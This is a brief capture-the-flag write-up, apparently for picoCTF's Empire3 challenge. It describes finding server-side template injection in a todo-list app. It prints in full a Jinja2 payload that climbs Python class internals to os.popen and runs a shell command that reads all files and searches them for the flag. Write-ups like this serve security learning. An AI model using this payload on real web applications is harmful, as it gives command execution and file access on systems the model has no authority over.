Agent 513! One of your dastardly colleagues is laughing very sinisterly! Can you access his todo list and discover his nefarious plans?
(link) or
Empire2 had gone by pretty quickly. At this point, I just wanted to confirm to myself that they followed the pattern of the other two Empire challenges and had used a new vulnerability in the cards/todo titles.
I plugged in {{ 2 + 2 }} '
to see how it would behave, and to my surprise, it was vulnerable to SSTI again.
The next thing I did was to throw in my payload from Empire2. I was just hoping to get lucky:
{{ g.__class__.__mro__[1].__subclasses__()[117].__init__.__globals__['sys'].modules['os'].popen("cat $(find . -type f) | grep picoCTF").read() }}
Seriously? That was easy. I solved it in like 30 seconds by reusing the payload. I guess I complicated Empire2 more than I needed to or something. Oh well. Easy 1.5k points.